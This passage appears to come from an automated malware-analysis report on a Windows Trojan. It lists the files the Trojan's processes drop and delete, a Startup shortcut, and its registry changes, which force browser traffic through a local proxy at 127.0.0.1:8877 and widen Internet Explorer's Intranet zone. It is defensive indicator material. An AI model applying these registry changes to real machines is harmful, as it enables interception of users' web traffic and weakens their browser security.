%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns21.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns46.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns37.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns89.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns30.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns90.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns95.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns67.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns96.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns36.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns60.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns58.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns33.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns68.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns98.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns39.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns28.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns82.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns52.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns69.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns80.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns49.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns55.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns20.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns41.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns66.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns44.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns65.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns70.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns40.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns32.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns34.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns42.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns45.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns31.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns85.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns91.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns38.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns88.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns71.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns43.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns35.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA0.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3B.tmp (0 bytes)
The process internetport3.exe:360 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IE36GWQC\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZPECZLK\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXBXQRST\desktop.ini (67 bytes)
C:\a\loogg2.txt (240 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ICMA9FQ2\desktop.ini (67 bytes)
C:\a\logff.txt (718 bytes)
The process DYK287G2Jhwy64P0Ln0s.exe:1012 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZPECZLK\ckkkp[1].htm (324 bytes)
C:\a\1logff.txt (718 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\aDYK287G2Jhwy64P0Ln0s.html (303 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\inetc.dll (20 bytes)
C:\a\1loogg2.txt (170 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\DYK287G2Jhwy64P0Ln0s.html (716 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\ns27.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\apDYK287G2Jhwy64P0Ln0s.html (324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ICMA9FQ2\ckkk[1].htm (303 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXBXQRST\localhost[1].htm (716 bytes)
C:\a\vv11111.txt (22835 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\aDYK287G2Jhwy64P0Ln0s.html (0 bytes)
C:\a\ProcessList.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\DYK287G2Jhwy64P0Ln0s.html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\ns27.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\apDYK287G2Jhwy64P0Ln0s.html (0 bytes)
C:\a\vv11111.txt (0 bytes)
The process %original file name%.exe:1756 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\a\FiddlerCore.dll (9485 bytes)
C:\a\zuur.txt (2 bytes)
C:\a\internetport3.exe (10 bytes)
C:\a\wcheckf.exe (397 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\System.dll (11 bytes)
C:\a\zhho.txt (3 bytes)
C:\a\zvchk.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ICMA9FQ2\uniqueDYK287G2Jhwy64P0Ln0s[1].htm (10 bytes)
%Program Files%\FastInternet\app.exe (1078 bytes)
C:\a\29935426.bat (287 bytes)
C:\a\winonit.exe (435 bytes)
C:\a\DYK287G2Jhwy64P0Ln0s.exe (3808 bytes)
C:\a\ayyyyy.txt (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\AccessControl.dll (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\inetc.dll (20 bytes)
C:\a\ukey.ini (27 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXBXQRST\bdcount[1].htm (8 bytes)
C:\a\zvv.txt (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZPECZLK\DYK287G2Jhwy64P0Ln0s[1].exe (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\UAC.dll (13 bytes)
C:\a\ver.ini (8 bytes)
C:\a\getcap.exe (10027 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\pwgen.dll (17 bytes)
C:\a\uniqueDYK287G2Jhwy64P0Ln0s.ini (10 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\intr.lnk (527 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IE36GWQC\cki[1].htm (11 bytes)
%System%\63839615.bat (19 bytes)
C:\a\install.txt (1 bytes)
%Program Files%\FastInternet\dotuninstall.exe (1084 bytes)
C:\a\wincheckfe.exe (778 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp (4 bytes)
C:\a\lOD0hGDlkq.exe (5873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\SimpleFC.dll (5289 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\UAC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\pwgen.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\AccessControl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\SimpleFC.dll (0 bytes)
Registry activity
The process winonit.exe:1360 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 03 00 00 00 28 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = ""
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E8 8D 5D E1 37 C1 36 55 E7 82 31 EC 60 50 5D AD"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"-loopback>
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process getcap.exe:500 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "23 AD A8 23 DC 66 62 C4 37 71 C6 6A 38 98 24 0B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process WMIC.exe:568 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9D A5 EA 88 81 6C 58 DD B8 35 05 49 37 C5 C2 46"
The process wincheckfe.exe:1768 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DD D9 CB 7A EA 62 17 E3 D3 1C D4 6B F9 6C A5 77"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process wcheckf.exe:484 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation" = "Pn"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 03 00 00 00 28 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = ""
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F0 C5 1C 10 E0 0C B7 64 12 3A 69 55 38 29 94 B0"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation" = "Pn"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation64Bit" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation64Bit" = "0"-loopback>
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process vchk.exe:1976 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 23 00 00 00 03 00 00 00 28 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = ""
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "41 4D 48 51 19 FD 70 B2 60 12 A3 A6 B7 0C 60 D0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"-loopback>
